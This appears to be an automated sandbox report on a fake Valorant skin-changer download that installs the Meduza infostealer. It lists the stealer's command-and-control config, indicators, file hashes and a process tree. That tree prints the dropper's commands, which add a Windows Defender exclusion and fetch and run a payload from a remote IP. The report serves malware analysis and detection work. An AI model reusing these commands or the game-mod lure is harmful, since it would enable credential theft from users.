Analysis
-
max time kernel
138s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
08/03/2025, 07:51
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
meduza
1
45.93.20.15
-
anti_dbg
true
-
anti_vm
true
-
build_name
1
-
extensions
.txt; .doc; .xlsx
-
grabber_maximum_size
4194304
-
port
15666
-
self_destruct
false
Signatures
-
Meduza Stealer payload 1 IoCs
resource yara_rule behavioral1/files/0x000f000000023b7b-315.dat family_meduza -
Meduza family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2236 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 92 812 curl.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation Valorant_Skin_Changer.exe Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation 1.exe -
Executes dropped EXE 2 IoCs
pid Process 5720 Valorant_Skin_Changer.exe 1256 1.exe -
Loads dropped DLL 1 IoCs
pid Process 5720 Valorant_Skin_Changer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 ipinfo.io 45 ipinfo.io 94 api.ipify.org 95 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Valorant_Skin_Changer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 940 msedge.exe 940 msedge.exe 1992 msedge.exe 1992 msedge.exe 1560 identity_helper.exe 1560 identity_helper.exe 6044 msedge.exe 6044 msedge.exe 2236 powershell.exe 2236 powershell.exe 1256 1.exe 1256 1.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeRestorePrivilege 3276 7zG.exe Token: 35 3276 7zG.exe Token: SeSecurityPrivilege 3276 7zG.exe Token: SeSecurityPrivilege 3276 7zG.exe Token: SeDebugPrivilege 2236 powershell.exe Token: SeDebugPrivilege 1256 1.exe Token: SeImpersonatePrivilege 1256 1.exe Token: SeDebugPrivilege 5952 taskmgr.exe Token: SeSystemProfilePrivilege 5952 taskmgr.exe Token: SeCreateGlobalPrivilege 5952 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe -
Suspicious use of SendNotifyMessage 58 IoCs
pid Process 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe 5952 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5720 Valorant_Skin_Changer.exe 5720 Valorant_Skin_Changer.exe 5720 Valorant_Skin_Changer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1992 wrote to memory of 5112 1992 msedge.exe 87 PID 1992 wrote to memory of 5112 1992 msedge.exe 87 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 1680 1992 msedge.exe 88 PID 1992 wrote to memory of 940 1992 msedge.exe 89 PID 1992 wrote to memory of 940 1992 msedge.exe 89 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 PID 1992 wrote to memory of 4896 1992 msedge.exe 90 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 1.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://valorantskinchanger.pro/about.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd84b746f8,0x7ffd84b74708,0x7ffd84b747182⤵PID:5112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:22⤵PID:1680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:82⤵PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:12⤵PID:3188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:12⤵PID:3712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:82⤵PID:4480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:12⤵PID:2896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:12⤵PID:1160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:5044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:12⤵PID:3548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5292 /prefetch:82⤵PID:3188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:12⤵PID:1120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:6044
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4212
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:644
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5244
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\" -spe -an -ai#7zMap24788:110:7zEvent212841⤵
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\Valorant_Skin_Changer.exe"C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\Valorant_Skin_Changer.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"2⤵
- System Location Discovery: System Language Discovery
PID:456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o 1.exe http://147.45.44.170/1.exe & start 1.exe2⤵
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\SysWOW64\curl.execurl -o 1.exe http://147.45.44.170/1.exe3⤵
- Downloads MZ/PE file
PID:812
-
-
C:\Windows\Temp\1.exe1.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1256
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5952
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD56738f4e2490ee5070d850bf03bf3efa5
SHA1fbc49d2dd145369e8861532e6ebf0bd56a0fe67c
SHA256ca80bbae3c392e46d730a53d0ee4cfecbbe45c264ad3b3c7ee287252c21eaeab
SHA5122939edf5e6c34c9ea669a129a4a5a410fbbd29cd504dc8e007e9b3b3c7fbb9bea8c14d6177ac375d0c481995774a02d210328569231cb01db07b59452333b22b
-
Filesize
152B
MD593be3a1bf9c257eaf83babf49b0b5e01
SHA1d55c01e95c2e6a87a5ece8cc1d466cc98a520e2a
SHA2568786fd66f4602e6ed3fa5248bd597b3f362ffa458f85207eaa154beb55522348
SHA512885b09dd3072921f375eedb5f0575561adc89700ecfbe999bc3e5ea1d7cb45e19d85c5e420f2c0a12b428742e1110e66f4ceecbe5a6badddd36cc9e0aff48e52
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize96B
MD56ba1b773ffc22f78dacb9c0ac895c45e
SHA1a0eb81ec16ac9e21cc808bf3a341aecb4e534383
SHA2567bb8bb840cc6b39a90443d86a769231fec139c97cc45e2d331010573f33c8829
SHA512760cf2a201432cd790e2a636d9bd196d0bcac8439b7d91ac157029a9a861b65f907c0be8c54e2df021ba2bf81a00e54e23645fa7c7d737b439362d80a0d29c07
-
Filesize
124KB
MD5aa01d8366b7cef38a29d66c38a03f988
SHA1b5d5c9d9d4d25fb79c8321f90e939d71434cb816
SHA256abb3a4b2e89f488f9b6a83733a9dfcac4d01fefb6579ececd210e31f0e6c0cac
SHA512a057d1e4b28ccb48c94077635dd5d7f8b9af747f7e905d556612180a9e9f3826ac7ac1bfe4ebcb68dc0ad63624f614ace55c34469a0716bb05c4f82ca624a57a
-
Filesize
334B
MD51b68d83ef41d1c6bd688cc4eed94e431
SHA1cdccdfe8dcf66565b9b8d03d3043411566e8e5c9
SHA2568ede4bbf571bdb343583fba0cb741d33253d84d098ce51ed0b52665cc80ff17d
SHA5125006c9568ef9463da0046db6c6f85e9c24cf68708f2497f53bb8096e641937b99125ac0b5d1c1d50d839314f3fd846fa376fd7034bd4242c8b2029da6637f335
-
Filesize
842B
MD57da05e63aa2363f8bf8bbcd7b368c7d7
SHA1c8823d60f47e087d8ecbb0b689f2d5145f3449c3
SHA256717a739cdbe0a9bd2e0421718594aaa7c70fe500c07052d7aa7303c07f2cec6d
SHA51231691eaec6d6c3277b7ff368804685dbfee0e02ee0db574f046b82eb96dab278da7090c11d17d2c15be1b0793a4efb58e79a1c4bc11f3f558a78466401d3311a
-
Filesize
6KB
MD59494cf2e2341c108e5f9bce91efd8bf6
SHA14f052d1800f1746c65fa6f89376c496c57805f5e
SHA2562f97889a4d0d4d06d8e0580eb373d89c5bb09735b638e9690635f5151df623f0
SHA512fc43bb0d5eb900b9e27c13e0e0069c70acfdf051612fdd94fc328870de2ee7358be01aba02486979fe46e3eb089ca8efc5d656bb9b46ee97ffcbb1ec472ff2ab
-
Filesize
6KB
MD5d85110f97de550212d7a6df075ad9bc9
SHA16f9861d705765705fe6d96a62bfbb3a4972812ab
SHA25652eb3b94d2e68a7dc06a29932fcdefb75d237642af0106109eaa6c3f6c7187ed
SHA512b05ce358d33dc1e944fb25693c612b8bc0f82c5dce66022fc30946211dccdf465df85fdbe24a8b9edaf5b38d57b10c444178b586ddd9e5f1f96e86809daffaa8
-
Filesize
6KB
MD568d4a7a404aa0c923bb27aacc9f83ded
SHA182cf7ad829ac6f63024cac12b0a4494ab53daaf5
SHA256e0f937c4139f6f62e9db6cde0b9624fd7d1cd094be7252e46a08f91c0768e768
SHA512ffe48f1904d19616f4240d0f8b64d12d127955c06fc7ad2151e5c9604e9733bdad5d743c6593187ac4d99cb99a71c9f760a6cd72697a4b07926881f9ec75078e
-
Filesize
5KB
MD59af8d497d80fb1bf6d23583ea1baf314
SHA160f7daef4fd8b4d74bd1972065e502b18e4fe42c
SHA256f13d8b66f7f73aa447ea7ba8876c7481679dc8a3f34d76fb05ba18037bb727ce
SHA51272eccdb7f43170d229d60a76812e363fdd87048e75224a20c719b9b1078bfe77bca4bc7e1456f3759d4b406a12b39db8a09e9006164aab0b149101993ac38e31
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5b3ffa6533ede876d3a9ab4888aaebb76
SHA1a80f0d7c217c1889eaa9f95409c381faaccac7c6
SHA2569e5bcab71f871f5e7ec7386e7eafdcb23919b3560b704f09334b4c7f8037fd03
SHA5120a0b51de273b4de487b3c9aea20d3048fe1cb68de788141f06a7f5154daa4622fa24654642f7e7c96930f56d484dc1b64ea33e3634539eaf41e2011c8a9c57ee
-
Filesize
12KB
MD5a7f5ef36be4c55450cb1c73f6d0a615d
SHA12e36f13bdc58565dc786a6185d04e9ac0a15b116
SHA256cf2d4591fe48814452387b5b841bf822d990f9143c86e193d6e6918b212de6ae
SHA512dafbacead546e2e38a73d64bdfe538ecda954816a01cf4fa6d4e71b1f1ee81e13f0717af886bbf0b154aa6fafab9a67a0db146e13d8cf3fc6a5d8a96a1d854bf
-
Filesize
12KB
MD57404ee509fcbf8f2274a9dbf412f8c96
SHA1af577ca14baa8c7da8e3072f45ee703a333b8e2c
SHA25653bded501a6a37170c6c73d270b262316198f6fd9c8dbe392f588e70e01cecbb
SHA51265613959f0cf82aef42556b9e001cf480cd73f33e02668e6dd916a9a50a9fb6f85fd982175b4d47049096144298830627f709a704efff053305e1ff3ccc7d9ef
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
